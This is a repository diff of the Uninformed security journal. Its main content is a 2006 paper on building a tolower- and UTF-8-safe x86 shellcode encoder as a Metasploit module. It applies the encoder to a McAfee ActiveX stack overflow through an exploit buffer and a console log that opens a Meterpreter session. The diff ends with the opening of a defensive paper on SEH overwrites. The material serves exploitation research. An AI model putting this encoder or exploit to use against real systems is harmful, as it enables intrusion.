This paper describes a technique that can be applied in certain situations to gain arbitrary code execution through software bugs that would not otherwise be exploitable, such as NULL pointer dereferences. To facilitate this, an attacker gains control of the top-level unhandled exception filter for a process in an indirect fashion. While there has been previous work illustrating the usefulness in gaining control of the top-level unhandled exception filter, Microsoft has taken steps in XPSP2 and beyond, such as function pointer encoding, to prevent attackers from being able to overwrite and control the unhandled exception filter directly. While this security enhancement is a marked improvement, it is still possible for an attacker to gain control of the top-level unhandled exception filter by taking advantage of a design flaw in the way unhandled exception filters are chained. This approach, however, is limited by an attacker's ability to control the chaining of unhandled exception filters, such as through the loading and unloading of DLLs. This does reduce the global impact of this approach; however, there are some interesting cases where it can be immediately applied, such as with Internet Explorer.
txt | pdf | html
General Research
Abusing Mach on Mac OS X
nemo
This paper discusses the security implications of Mach being integrated with the Mac OS X kernel. A few examples are used to illustrate how Mach support can be used to bypass some of the BSD security features, such as securelevel. Furthermore, examples are given that show how Mach functions can be used to supplement the limited ptrace functionality included in Mac OS X.
txt | pdf | html
Rootkit Technology
GREPEXEC: Grepping Executive Objects from Pool Memory
bugcheck
As rootkits continue to evolve and become more advanced, methods that can be used to detect hidden objects must also evolve. For example, relying on system provided APIs to enumerate maintained lists is no longer enough to provide effective cross-view detection. To that point, scanning virtual memory for object signatures has been shown to provide useful, but limited, results. The following paper outlines the theory and practice behind scanning memory for hidden objects. This method relies upon the ability to safely reference the Windows system virtual address space and also depends upon building and locating effective memory signatures. Using this method as a base, suggestions are made as to what actions might be performed once objects are detected. The paper also provides a simple example of how object-independent signatures can be built and used to detect several different kernel objects on all versions of Windows NT+. Due to time constraints, the source code associated with this paper will be made publicly available in the near future.
txt | pdf | html
What Were They Thinking?
Anti-Virus Software Gone Wrong
Skywing
Anti-virus software is becoming more and more prevalent on end-user computers today. Many major computer vendors (such as Dell) bundle anti-virus software and other personal security suites in the default configuration of newly-sold computer systems. As a result, it is becoming increasingly important that anti-virus software be well-designed, secure by default, and interoperable with third-party applications. Software that is installed and running by default constitutes a prime target for attack and, as such, it is especially important that said software be designed with security and interoperability in mind. In particular, this article provides examples of issues found in well-known anti-virus products. These issues range from not properly validating input from an untrusted source (especially within the context of a kernel driver) to failing to conform to API contracts when hooking or implementing an intermediary between applications and the underlying APIs upon which they rely. For popular software, or software that is installed by default, errors of this sort can become a serious problem to both system stability and security. Beyond that, it can impact the ability of independent software vendors to deploy functioning software on end-user systems.
txt | pdf | html

817
uninformed/5.1.txt Normal file
View File

@ -0,0 +1,817 @@
Implementing a Custom X86 Encoder
Aug, 2006
skape
mmiller@hick.org
1) Foreword
Abstract: This paper describes the process of implementing a custom
encoder for the x86 architecture. To help set the stage, the McAfee
Subscription Manager ActiveX control vulnerability, which was discovered
by eEye, will be used as an example of a vulnerability that requires the
implementation of a custom encoder. In particular, this vulnerability
does not permit the use of uppercase characters. To help make things
more interesting, the encoder described in this paper will also avoid
all characters above 0x7f. This will make the encoder both UTF-8 safe
and tolower safe.
Challenge: The author believes that a UTF-8 safe and tolower safe
encoder could most likely be implemented in a much more optimized
fashion that incurs far less overhead in terms of size. If any reader
has ideas about ways in which this might be approached, feel free to
contact the author. A bonus challenge would be to identify a geteip
technique that can be used with these character limitations.
2) Introduction
In the month of August, eEye released an advisory for a stack-based
buffer overflow that was found in the McAfee Subscription Manager
ActiveX control. The underlying vulnerability was in an insecure call
to vsprintf that was exposed through scripting-accessible routines. At a
glance, this vulnerability would appear trivial to exploit given that
it's a very basic stack overflow. However, once it comes to
transmitting a payload, or even a particular return address, certain
limiting factors begin to appear. The focus of this paper will center
around an exercise in implementing a custom encoder to overcome certain
character set limitations. The McAfee Subscription Manager vulnerability
will be used as a real-world example of a vulnerability that requires a
custom encoder to exploit.
When it comes to exploiting this vulnerability, the first step is to
reproduce the conditions reported in the advisory. Like most
vulnerabilities, it's customary to send an arbitrary sequence of bytes,
such as A's. However, in this particular exploit, sending a sequence of
A's, which equates to 0x41, actually causes the return address to be
overwritten with 0x61's which are lowercase a's. Judging from this, it
seems obvious that the input string is undergoing a tolower operation
and it will not be possible for the payload or return address to contain
any uppercase characters.
Given these character restrictions, it's safe to go forward with writing
the exploit. To simply get a proof of concept for code execution, it
makes sense to put a series of int3's, represented by the 0xcc opcode,
immediately following the return address. The return address could then
be pointed to the location of a push esp / ret or some other type of
instruction that transfers control to where the series of int3's should
reside. Once the vulnerability is triggered, the debugger should break
in at an int3 instruction, but that's not actually what happens.
Instead, it breaks in on a completely different instruction:
(4f8.58c): Unknown exception - code c0000096 (!!! second chance !!!)
eax=00000f19 ebx=00000000 ecx=00139438
edx=0013a384 esi=00001b58 edi=0013a080
eip=0013a02c esp=0013a02c ebp=36213365 iopl=0
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000
0013a02c ec in al,dx
0:000> u eip
0013a02c ec in al,dx
0013a02d ec in al,dx
0013a02e ec in al,dx
0013a02f ec in al,dx
Again, it looks like the buffer is undergoing some sort of transformation. One
quick thing to notice is that 0xcc + 0x20 = 0xec. This is similar to what
would happen when changing an uppercase character to a lowercase character,
such as where 'A', or 0x41, is converted to 'a', or 0x61, by adding 0x20. It
appears that the operation that's performing the case lowering may also be
inadvertently performing it on a specific high ASCII range.
What's actually occurring is that the subscription manager control is calling
mbslwr, using the statically linked CRT, on a copy of the original input
string. Internally, mbslwr calls into crtLCMapStringA. Eventually this will
lead to a call out to kernel32!LCMapStringW. The second parameter to this
routine is dwMapFlags which describes what sort of transformations, if any,
should be performed on the buffer. The mbslwr routine passes 0x100, or
LCMAP_LOWERCASE. This is what results in the lowering of the string.
So, given this information, it can be determined that it will not be possible
to use characters through and including 0x41 and 0x5A as well as, for the sake
of clarity, 0xc0 and 0xe0. In actuality, not all of the characters in this
range are bad. The main reason this ends up causing problems is because many
of the payload encoders out there for x86, including those in Metasploit, rely
on characters from these two sets for their decoder stub and subsequent encoded
data. For that reason, and for the challenge, it's worth pursuing the
implementation of a custom encoder.
While this particular vulnerability will permit the use of many characters
above 0x80, it makes the challenge that much more interesting, and particulary
useful, to limit the usable character set to the characters described below.
The reason this range is more useful is because the characters are UTF-8 safe
and also tolower safe. Like most good payloads, the encoder will also avoid
NULL bytes.
0x01 -> 0x40
0x5B -> 0x7f
As with all encoded formats, there are actually two major pieces involved. The
first part is the encoder itself. The encoder is responsible for taking a raw
buffer and encoding it into the appropriate format. The second part is the
decoder, which, as is probably obvious, takes the encoded form and converts it
back into the raw form so that it can be executed as a payload. The
implementation of these two pieces will be described in the following chapters.
3) Implementing the Decoder
The implementation of the decoder involves taking the encoded form and
converting it back into the raw form. This must all be done using assembly
instructions that will execute natively on the target machine after an exploit
has succeeded and it must also use only those instructions that fall within the
valid character set. To accomplish this, it makes sense to figure out what
instructions are available out of the valid character set. To do that, it's as
simple as generating all of the permutations of the valid characters in both
the first and second byte positions. This provides a pretty good idea of what's
available. The end-result of such a process is a list of about 105 unique
instructions (independent of operand types). Of those instructions the most
interesting are listed below:
add
sub
imul
inc
cmp
jcc
pusha
push
pop
and
or
xor
Some very useful instructions are available, such as add, xor, push, pop, and a
few jcc's. While there's an obvious lack of the traditional mov instruction,
it can be made up for through a series of push and pop instructions, if needed.
With the set of valid instructions identified, it's possible to begin
implementing the decoder. Most decoders will involve three implementation
phases. The first phase is used to determine the base address of the decoder
stub using a geteip technique. Following that, the encoded data must be
transformed from its character-safe form to the form that it will actually
execute from. Finally, the decoder must transfer control into the decoded data
so that the actual payload can begin executing. These three steps will be
described in the following sections.
In order to better understand the following sections, it's important to
describe the general approach that is going to be taken to implement the
decoder. The stub header is used to prepare the necessary state for the decode
transforms. The transforms themselves take the encoded data, as a series of
four byte blocks, and translate it using the process described in section .
Finally, execution falls through to the decoded data that is stored in place of
the encoded data.
3.1) Determining the Stub's Base Address
The first step in most decoder stubs will require the use of a series of
instructions, also referred to as geteip code, that obtain the location of the
current instruction pointer. The reason this is necessary is because most
decoders will have the encoded data placed immediately following the decoder
stub in memory. In order to operate on the encoded data using an absolute
address, it is necessary to determine where the data is at. If the decoder
stub can determine the address that it's executing from, then it can determine
the address of the encoded data immediately following it in memory in a
position-independent fashion. As one might expect, the character limitations of
this challenge make it quite a bit harder to get the value current instruction
pointer.
There are a number of different techniques that can be used to get the value of
the instruction pointer on x86. However, the majority of these techniques rely
on the use of the call instruction. The problem with the use of the call
instruction is that it is generally composed of a high ASCII byte, such as 0xe8
or 0xff. Another technique that can be used to get the instruction pointer is
the fnstenv FPU instruction. Unfortunately, this instruction is also composed
of bytes in the high ASCII range, such as 0xd9. Yet another approach is to use
structured exception handling to get the instruction pointer. This is
accomplished by registering an exception handler and extracting the Eip value
from the CONTEXT structure when an exception is generated. In fact, this
approach has even been implemented in entirely alphanumeric form for Windows by
SkyLined. Unfortunately, it can't be used in this case because it relies on
uppercase characters.
With all of the known geteip techniques unusable, it seems like some
alternative method for getting the base address of the decoder stub will be
needed. In the world of alphanumeric encoders, such as SkyLined's Alpha2, it
is common for the decoder stub to assume that a certain register contains the
base address of the decoder stub. This assumption makes the decoder more
complicated to use because it can't simply be dropped into any exploit and be
expected to work. Instead, exploits may need to be modified in order to ensure
that a register can be found that contains the location, or some location near,
the decoder stub.
At the time of this writing, the author is not aware of a geteip technique that
can be used that is both 7-bit safe and tolower safe. Like the alphanumeric
payloads, the decoder described in this paper will be implemented using a
register that is explicitly assumed to contain a reference to some address that
is near the base address of the decoder stub. For this document, the register
that is assumed to hold the address will be ecx, but it is equally possible to
use other registers.
For this particular decoder, determining the base address is just the first
step involved in implementing the stub's header. Once the base address has
been determined, the decoder must adjust the register that holds the base
address to point to the location of the encoded data. The reason this is
necessary is because the next step of the decoder, the transforms, depend on
knowing the location of the encoded data that they will be operating on. In
order to calculate this address, the decoder must add the size of the stub
header plus the size of the all of the decode transforms to the register that
holds the base address. The end result should be that the register will hold
the address of the first encoded block.
The following disassembly shows one way that the stub header might be
implemented. In this disassembly, ecx is assumed to point at the beginning of
the stub header:
00000000 6A12 push byte +0x12
00000002 6B3C240B imul edi,[esp],byte +0xb
00000006 60 pusha
00000007 030C24 add ecx,[esp]
0000000A 6A19 push byte +0x19
0000000C 030C24 add ecx,[esp]
0000000F 6A04 push byte +0x4
The purpose of the first two instructions is to calculate the number of bytes
consumed by all of the decode transforms (which are described in section ). It
accomplishes this by multiplying the size of each transform, which is 0xb
bytes, by the total number of transforms, which in this example 0x12. The
result of the multiplication, 0xc6, is stored in edi. Since each transform is
capable of decoding four bytes of the raw payload, the maximum number of bytes
that can be encoded is 508 bytes. This shouldn't be seen as much of a limiting
factor, though, as other combinations of imul can be used to account for larger
payloads.
Once the size of the decode transforms has been calculated, pusha is executed
in order to place the edi register at the top of the stack. With the value of
edi at the top of the stack, the value can be added to the base address
register ecx, thus accounting for the number of bytes used by the decode
transforms. The astute reader might ask why the value of edi is indirectly
added to ecx. Why not just add it directly? The answer, of course, is due to
bad characters:
00000000 01F9 add ecx,edi
It's also not possible to simply push edi onto the stack, because the push edi
instruction also contains bad characters:
00000000 57 push edi
Starting with the fifth instruction, the size of the stub header, plus any
other offsets that may need to be accounted for, are added to the base address
in order to shift the ecx register to point at the start of the encoded data.
This is accomplished by simply pushing the the number of bytes to add onto the
stack and then adding them to the ecx register indirectly by adding through
[esp].
After these instructions are finished, ecx will point to the start of the
encoded data. The final instruction in the stub header is a push byte 0x4. This
instruction isn't actually used by the stub header, but it's there to set up
some necessary state that will be used by the decode transforms. It's use will
be described in the next section.
3.2) Transforming the Encoded Data
The most important part of any decoder is the way in which it transforms the
data from its encoded form to its actual form. For example, many of the
decoders used in the Metasploit Framework and elsewhere will xor a portion of
the encoded data with a key that results in the actual bytes of the original
payload being produced. While this an effective way of obtaining the desired
results, it's not possible to use such a technique with the character set
limitations currently defined in this paper.
In order to transform encoded data back to its original form, it must be
possible to produce any byte from 0x00 to 0xff using any number of combinations
of bytes that fall within the valid character set. This means that this
decoder will be limited to using combinations of character that fall within
0x01-0x40 and 0x5b-0x7f. To figure out the best possible means of
accomplishing the transformation, it makes sense to investigate each of the
useful instructions that were identified earlier in this chapter.
The bitwise instructions, such as and, or, and xor are not going to be
particularly useful to this decoder. The main reason for this is that they are
unable to produce values that reside outside of the valid character sets
without the aide of a bit shifting instruction. For example, it is impossible
to bitwise-and two non-zero values in the valid character set together to
produce 0x00. While xor could be used to accomplish this, that's about all that
it could do other than producing other values below the 0x80 boundary. These
restrictions make the bitwise instructions unusable.
The imul instruction could be useful in that it is possible to multiply two
characters from the valid character set together to produce values that reside
outside of the valid character set. For example, multiplying 0x02 by 0x7f
produces 0xfe. While this may have its uses, there are two remaining
instructions that are actually the most useful.
The add instruction can be used to produce almost all possible characters.
However, it's unable to produce a few specific values. For example, it's
impossible to add two valid characters together to produce 0x00. It is also
impossible to add two valid characters together to produce 0xff and 0x01.
While this limitation may make it appear that the add instruction is unusable,
its saving grace is the sub instruction.
Like the add instruction, the sub instruction is capable of producing almost
all possible characters. It is certainly capable of producing the values that
add cannot. For example, it can produce 0x00 by subtracting 0x02 from 0x02.
It can also produce 0xff by subtracting 0x03 from 0x02. Finally, 0x01 can be
produce by subtracting 0x02 from 0x03. However, like the add instruction,
there are also characters that the sub instruction cannot produce. These
characters include 0x7f, 0x80, and 0x81.
Given this analysis, it seems that using add and sub in combination is most
likely going to be the best choice when it comes to transforming encoded data
for this decoder. With the fundamental operations selected, the next step is
to attempt to implement the code that actually performs the transformation. In
most decoders, the transform will be accomplished through a loop that simply
performs the same operation on a pointer that is incremented by a set number of
bytes each iteration. This type of approach results in all of the encoded data
being decoded prior to executing it. Using this type of technique is a little
bit more complicated for this decoder, though, because it can't simply rely on
the use of a static key and it's also limited in terms of what instructions it
can use within the loop.
For these reasons, the author decided to go with an alternative technique for
the transformation portion of the decoder stub. Rather than using a loop that
iterates over the encoded data, the author chose to use a series of sequential
transformations where each block of the encoded data was decoded. This
technique has been used before in similar situations. One negative aspect of
using this approach over a loop-based approach is that it substantially
increases the size of the encoded payload. While figure gives an idea of the
structure of the decoder, it doesn't give a concrete understanding of how it's
actually implemented. It's at this point that one must descend from the lofty
high-level. What better way to do this than diving right into the disassembly?
00000011 6830703C14 push dword 0x143c7030
00000016 5F pop edi
00000017 0139 add [ecx],edi
00000019 030C24 add ecx,[esp]
The form of each transform will look exactly like this one. What's actually
occurring is a four byte value is pushed onto the stack and then popped into
the edi register. This is done in place of a mov instruction because the mov
instruction contains invalid characters. Once the value is in the edi
register, it is either added to or subtracted from its respective encoded data
block. The result of the add or subtract is stored in place of the previously
encoded data. Once the transform has completed, it adds the value at the top
of the stack, which was set to 0x4 in the decoder stub header, to the register
that holds the pointer into the encoded data. This results in the pointer
moving on to the next encoded data block so that the subsequent transform will
operate on the correct block.
This simple process is all that's necessary to perform the transformations
using only valid characters. As mentioned above, one of the negative aspects
of this approach is that it does add quite a bit of overhead to the original
payload. For each four byte block, 11 bytes of overhead are added. The
approach is also limited by the fact that if there is ever a portion of the raw
payload that contains characters that add cannot handle, such as 0x00, and also
contains characters that sub cannot handle, such as 0x80, then it will not be
possible to encode it.
3.3) Transferring Control to the Decoded Data
Due to the way the decoder is structured, there is no need for it to include
code that directly transfers control to the decoded data. Since this decoder
does not use any sort of looping, execution control will simply fall through to
the decoded data after all of the transformations have completed.
4) Implementing the Encoder
The encoder portion is made up of code that runs on an attacker's machine prior
to exploiting a target. It converts the actual payload that will be executed
into the encoded format and then transmits the encoded form as the payload.
Once the target begins executing code, the decoder, as described in chapter ,
converts the encoded payload back into its raw form and then executes it.
For the purposes of this document, the client-side encoder was implemented in
the 3.0 version of the Metasploit Framework as an encoder module for x86. This
chapter will describe what was actually involved in implementing the encoder
module for the Metasploit Framework.
The very first step involved in implementing the encoder is to create the
appropriate file and set up the class so that it can be loaded into the
framework. This is accomplished by placing the encoder module's file in the
appropriate directory, which in this case is modules/encoders/x86. The name of
the module's file is important only in that the module's reference name is
derived from the filename. For example, this encoder can be referenced as
x86/avoidutf8tolower based on its filename. In this case, the module's
filename is avoidutf8tolower.rb. Once the file is created in the appropriate
location, the next step is to define the class and provide the framework with
the appropriate module information.
To define the class, it must be placed in the appropriate namespace that
reflects where it is at on the filesystem. In this case, the module is placed
in the Msf::Encoders::X86 namespace. The name of the class itself is not
important so long as it is unique within the namespace. When defining the
class, it is important that it inherit from the Msf::Encoder base class at some
level. This ensures that it implements all the required methods for an encoder
to function when the framework is interacting with it.
At this point, the class definition should look something like this:
require 'msf/core'
module Msf
module Encoders
module X86
class AvoidUtf8 < Msf::Encoder
end
end
end
end
With the class defined, the next step is to create a constructor and to pass
the appropriate module information down to the base class in the form of the
info hash. This hash contains information about the module, such as name,
version, authorship, and so on. For encoder modules, it also conveys
information about the type of encoder that's being implemented as well as
information specific to the encoder, like block size and key size. For this
module, the constructor might look something like this:
def initialize
super(
'Name' => 'Avoid UTF8/tolower',
'Version' => '$Revision: 1.3 $',
'Description' => 'UTF8 Safe, tolower Safe Encoder',
'Author' => 'skape',
'Arch' => ARCH_X86,
'License' => MSF_LICENSE,
'EncoderType' => Msf::Encoder::Type::NonUpperUtf8Safe,
'Decoder' =>
{
'KeySize' => 4,
'BlockSize' => 4,
})
end
With all of the boilerplate code out of the way, it's time to finally get into
implementing the actual encoder. When implementing encoder modules in the 3.0
version of the Metasploit Framework, there are a few key methods that can
overridden by a derived class. These methods are described in detail in the
developer's guide, so an abbreviated explanation of only those useful to this
encoder will be given here. Each method will be explained in its own
individual section.
4.1) decoder_stub
First and foremost, the decoderstub method gives an encoder module the
opportunity to dynamically generate a decoder stub. The framework's idea of
the decoder stub is equivalent to the stub header described in chapter . In
this case, it must simply provide a buffer whose assembly will set up a
specific register to point to the start of the encoded data blocks as described
in section . The completed version of this method might look something like
this:
def decoder_stub(state)
len = ((state.buf.length + 3) & (~0x3)) / 4
off = (datastore['BufferOffset'] || 0).to_i
decoder =
"\x6a" + [len].pack('C') + # push len
"\x6b\x3c\x24\x0b" + # imul 0xb
"\x60" + # pusha
"\x03\x0c\x24" + # add ecx, [esp]
"\x6a" + [0x11+off].pack('C') + # push byte 0x11 + off
"\x03\x0c\x24" + # add ecx, [esp]
"\x6a\x04" # push byte 0x4
state.context = ''
return decoder
end
In this routine, the length of the raw buffer, as found through
state.buf.length, is aligned up to a four byte boundary and then divided by
four. Following that, an optional buffer offset is stored in the off local
variable. The purpose of the BufferOffset optional value is to allow exploits
to cause the encoder to account for extra size overhead in the ecx register
when doing its calculations. The decoder stub is then generated using the
calculated length and offset to produce the stub header. The stub header is
then returned to the caller.
4.2) encode_block
The next important method to override is the encode_block method. This method
is used by the framework to allow an encoder to encode a single block and
return the resultant encoded buffer. The size of each block is provided to the
framework through the encoder's information hash. For this particular encoder,
the block size is four bytes. The implementation of the encode_block routine is
as simple as trying to encode the block using either the add instruction or the
sub instruction. Which instruction is used will depend on the bytes in the
block that is being encoded.
def encode_block(state, block)
buf = try_add(state, block)
if (buf.nil?)
buf = try_sub(state, block)
end
if (buf.nil?)
raise BadcharError.new(state.encoded, 0, 0, 0)
end
buf
end
The first thing encode_block tries is add. The try_add method is implemented as
shown below:
def try_add(state, block)
buf = "\x68"
vbuf = ''
ctx = ''
block.each_byte { |b|
return nil if (b == 0xff or b == 0x01 or b == 0x00)
begin
xv = rand(b - 1) + 1
end while (is_badchar(state, xv) or is_badchar(state, b - xv))
vbuf += [xv].pack('C')
ctx += [b - xv].pack('C')
}
buf += vbuf + "\x5f\x01\x39\x03\x0c\x24"
state.context += ctx
return buf
end
The try_add routine enumerates each byte in the block, trying to find a random
byte that, when added to another random byte, produces the byte value in the
block. The algorithm it uses to accomplish this is to loop selecting a random
value between 1 and the actual value. From there a check is made to ensure
that both values are within the valid character set. If they are both valid,
then one of the values is stored as one of the bytes of the 32-bit immediate
operand to the push instruction that is part of the decode transform for the
current block. The second value is appended to the encoded block context.
After all bytes have been considered, the instructions that compose the decode
transform are completed and the encoded block context is appended to the string
of encoded blocks. Finally, the decode transform is returned to the framework.
In the event that any of the bytes that compose the block being encoded by
try_add are 0x00, 0x01, or 0xff, the routine will return nil. When this
happens, the encode_block routine will attempt to encode the block using the sub
instruction. The implementation of the try_sub routine is shown below:
def try_sub(state, block)
buf = "\x68";
vbuf = ''
ctx = ''
carry = 0
block.each_byte { |b|
return nil if (b == 0x80 or b == 0x81 or b == 0x7f)
x = 0
y = 0
prev_carry = carry
begin
carry = prev_carry
if (b > 0x80)
diff = 0x100 - b
y = rand(0x80 - diff - 1).to_i + 1
x = (0x100 - (b - y + carry))
carry = 1
else
diff = 0x7f - b
x = rand(diff - 1) + 1
y = (b + x + carry) & 0xff
carry = 0
end
end while (is_badchar(state, x) or is_badchar(state, y))
vbuf += [x].pack('C')
ctx += [y].pack('C')
}
buf += vbuf + "\x5f\x29\x39\x03\x0c\x24"
state.context += ctx
return buf
end
Unlike the try_add routine, the try_sub routine is a little bit more
complicated, perhaps unnecessarily. The main reason for this is that
subtracting two 32-bit values has to take into account things like carrying
from one digit to another. The basic idea is the same. Each byte in the block
is enumerated. If the byte is above 0x80, the routine calculates the
difference between 0x100 and the byte. From there, it calculates the y value
as a random number between 1 and 0x80 minus the difference. Using the y value,
it generates the x value as 0x100 minus the byte value minus y plus the current
carry flag. To better understand this, consider the following scenario.
Say that the byte being encoded is 0x84. The difference between 0x100 and 0x84
is 0x7c. A valid value of y could be 0x3, as derived from rand(0x80 - 0x7c -
1) + 1. Given this value for y, the value of x would be, assuming a zero carry
flag, 0x7f. When 0x7f, or x, is subtracted from 0x3, or y, the result is 0x84.
However, if the byte value is less than 0x80, then a different method is used
to select the x and y values. In this case, the difference is calculated as
0x7f minus the value of the current byte. The value of x is then assigned a
random value between 1 and the difference. The value of y is then calculated
as the current byte plus x plus the carry flag. For example, if the value is
0x24, then the values could be calculated as described in the following
scenario.
First, the difference between 0x7f and 0x24 is 0x5b. The value of x could be
0x18, as derived from rand(0x5b - 1) + 1. From there, the value of y would be
calculated as 0x3c through 0x24 + 0x18. Therefore, 0x3c - 0x18 is 0x24.
Given these two methods of calculating the individual byte values, it's
possible to encode all byte with the exception of 0x7f, 0x80, and 0x81. If any
one of these three bytes is encountered, the try_sub routine will return nil
and the encoding will fail. Otherwise, the routine will complete in a fashion
similar to the try_add routine. However, rather than using an add instruction,
it uses the sub instruction.
4.3) encode_end
With all the encoding cruft out of the way, the final method that needs to be
overridden is encode_end. In this method, the state.context attribute is
appended to the state.encoded. The purpose of the state.context attribute is
to hold all of the encoded data blocks that are created over the course of
encoding each block. The state.encoded attribute is the actual decoder
including the stub header, the decode transformations, and finally, the encoded
data blocks.
def encode_end(state)
state.encoded += state.context
end
Once encoding completes, the result might be a disassembly that looks something
like this:
$ echo -ne "\x42\x20\x80\x78\xcc\xcc\xcc\xcc" | \
./msfencode -e x86/avoid_utf8_tolower -t raw | \
ndisasm -u -
[*] x86/avoid_utf8_tolower succeeded, final size 47
00000000 6A02 push byte +0x2
00000002 6B3C240B imul edi,[esp],byte +0xb
00000006 60 pusha
00000007 030C24 add ecx,[esp]
0000000A 6A11 push byte +0x11
0000000C 030C24 add ecx,[esp]
0000000F 6A04 push byte +0x4
00000011 683C0C190D push dword 0xd190c3c
00000016 5F pop edi
00000017 0139 add [ecx],edi
00000019 030C24 add ecx,[esp]
0000001C 68696A6060 push dword 0x60606a69
00000021 5F pop edi
00000022 0139 add [ecx],edi
00000024 030C24 add ecx,[esp]
00000027 06 push es
00000028 1467 adc al,0x67
0000002A 6B63626C imul esp,[ebx+0x62],byte +0x6c
0000002E 6C insb
5) Applying the Encoder
The whole reason that this encoder was originally needed was to take advantage
of the vulnerability in the McAfee Subscription Manager ActiveX control. Now
that the encoder has been implemented, all that's left is to try it out and see
if it works. To test this against a Windows XP SP0 target, the overflow buffer
might be constructed as follows.
First, a string of 2972 random text characters must be generated. The return
address should follow the random character string. An example of a valid
return address for this target is 0x7605122f which is the location of a jmp esp
instruction in shell32.dll. Immediately following the return address in the
overflow buffer should be a series of five instructions:
00000000 60 pusha
00000001 6A01 push byte +0x1
00000003 6A01 push byte +0x1
00000005 6A01 push byte +0x1
00000007 61 popa
The purpose of this series of instructions is to cause the value of esp at the
time that the pusha occurs to be popped into the ecx register. As the reader
should recall, the ecx register is used as the base address for the decoder
stub. However, since esp doesn't actually point to the base address of the
decoder stub, the encoder must be informed that 8 extra bytes must be added to
ecx when accounting for the extra offset into the encoded data blocks. This is
conveyed by setting the BufferOffset value to 8. After these five instructions
should come the encoded version of the payload. To better visualize this,
consider the following snippet from the exploit:
buf =
Rex::Text.rand_text(2972, payload_badchars) +
[ ret ].pack('V') +
"\x60" + # pusha
"\x6a" + Rex::Text.rand_char(payload_badchars) + # push byte 0x1
"\x6a" + Rex::Text.rand_char(payload_badchars) + # push byte 0x1
"\x6a" + Rex::Text.rand_char(payload_badchars) + # push byte 0x1
"\x61" + # popa
p.encoded
With the overflow buffer ready to go, the only thing left to do is fire off the
an exploit attempt by having the machine browse to the malicious website:
msf exploit(mcafee_mcsubmgr_vsprintf) > exploit
[*] Started reverse handler
[*] Using URL: http://x.x.x.3:8080/foo
[*] Server started.
[*] Exploit running as background job.
msf exploit(mcafee_mcsubmgr_vsprintf) >
[*] Transmitting intermediate stager for over-sized stage...(89 bytes)
[*] Sending stage (2834 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (73739 bytes)...
[*] Upload completed.
[*] Meterpreter session 1 opened (x.x.x.3:4444 -> x.x.x.105:2010)
msf exploit(mcafee_mcsubmgr_vsprintf) > sessions -i 1
[*] Starting interaction with 1...
meterpreter >
6) Conclusion
The purpose of this paper was to illustrate the process of implementing a
customer encoder for the x86 architecture. In particular, the encoder
described in this paper was designed to make it possible to encode payloads in
a UTF-8 and tolower safe format. To help illustrate the usefulness of such an
encoder, a recent vulnerability in the McAfee Subscription Manager ActiveX
control was used because of its restrictions on uppercase characters. While
many readers may never find it necessary to implement an encoder, it's
nevertheless a necessary topic to understand for those who are interested in
exploitation research.
A. References
eEye. McAfee Subscription Manager Stack Buffer Overflow.
http://lists.grok.org.uk/pipermail/full-disclosure/2006-August/048565.html;
accessed Aug 26, 2006.
Metasploit Staff. Metasploit 3.0 Developer's Guide.
http://www.metasploit.com/projects/Framework/msf3/developers_guide.pdf;
accessed Aug 26, 2006.
Spoonm. Recent Shellcode Developments.
http://www.metasploit.com/confs/recon2005/recent_shellcode_developments-recon05.pdf;
accessed Aug 26, 2006.
SkyLined. Alpha 2.
http://www.edup.tudelft.nl/ bjwever/documentation_alpha2.html.php;
accessed Aug 26, 2006.

782
uninformed/5.2.txt Normal file
View File

@ -0,0 +1,782 @@
Preventing the Exploitation of SEH Overwrites
9/2006
skape
mmiller@hick.org
1) Foreword
Abstract: This paper proposes a technique that can be used to prevent
the exploitation of SEH overwrites on 32-bit Windows applications
without requiring any recompilation. While Microsoft has attempted to
address this attack vector through changes to the exception dispatcher
and through enhanced compiler support, such as with /SAFESEH and /GS,
the majority of benefits they offer are limited to image files that have
been compiled to make use of the compiler enhancements. This limitation
means that without all image files being compiled with these
enhancements, it may still be possible to leverage an SEH overwrite to
gain code execution. In particular, many third-party applications are
still vulnerable to SEH overwrites even on the latest versions of
Windows because they have not been recompiled to incorporate these
enhancements. To that point, the technique described in this paper does
not rely on any compile time support and instead can be applied at
runtime to existing applications without any noticeable performance
degradation. This technique is also backward compatible with all
versions of Windows NT+, thus making it a viable and proactive solution
for legacy installations.
Thanks: The author would like to thank all of the people who have helped
with offering feedback and ideas on this technique. In particular, the
author would like to thank spoonm, H D Moore, Skywing, Richard Johnson,
and Alexander Sotirov.
2) Introduction
Like other operating systems, the Windows operating system finds itself
vulnerable to the same classes of vulnerabilities that affect other
platforms, such as stack-based buffer overflows and heap-based buffer
overflows. Where the platforms differ is in terms of how these
vulnerabilities can be leveraged to gain code execution. In the case of
a conventional stack-based buffer overflow, the overwriting of the
return address is the most obvious and universal approach. However,
unlike other platforms, the Windows platform has a unique vector that
can, in many cases, be used to gain code execution through a stack-based
overflow that is more reliable than overwriting the return address.
This vector is known as a Structured Exception Handler (SEH) overwrite.
This attack vector was publicly discussed for the first time, as far as
the author is aware, by David Litchfield in his paper entitled Defeating
the Stack Based Buffer Overflow Prevention Mechanism of Microsoft
Windows 2003 Server However, exploits had been using this technique
prior to the publication, so it is unclear who originally found the
technique.
In order to completely understand how to go about protecting against SEH
overwrites, it's prudent to first spend some time describing the
intention of the facility itself and how it can be abused to gain code
execution. To provide this background information, a description of
structured exception handling will be given in section 2.1. Section 2.2
provides an illustration of how an SEH overwrite can be used to gain
code execution. If the reader already understands how structured
exception handling works and can be exploited, feel free to skip ahead.
The design of the technique that is the focus of this paper will be
described in chapter 3 followed by a description of a proof of concept
implementation in chapter 4. Finally, potential compatibility issues are
noted in chapter 5.
2.1) Structured Exception Handling
Structured Exception Handling (SEH) is a uninform system for dispatching
and handling exceptions that occur during the normal course of a
program's execution. This system is similar in spirit to the way that
UNIX derivatives use signals to dispatch and handle exceptions, such as
through SIGPIPE and SIGSEGV. SEH, however, is a more generalized and
powerful system for accomplishing this task, in the author's opinion.
Microsoft's integration of SEH spans both user-mode and kernel-mode and
is a licensed implementation of what is described in a patent owned by
Borland. In fact, this patent is one of the reasons why open source
operating systems have not chosen to integrate this style of exception
dispatching.
In terms of implementation, structured exception handling works by
defining a uniform way of handling all exceptions that occur during the
normal course of process execution. In this context, an exception is
defined as an event that occurs during execution that necessitates some
form of extended handling. There are two primary types of exceptions.
The first type, known as a hardware exception, is used to categorize
exceptions that originate from hardware. For example, when a program
makes reference to an invalid memory address, the processor will raise
an exception through an interrupt that gives the operating system an
opportunity to handle the error. Other examples of hardware exceptions
include illegal instructions, alignment faults, and other
architecture-specific issues. The second type of exception is known as
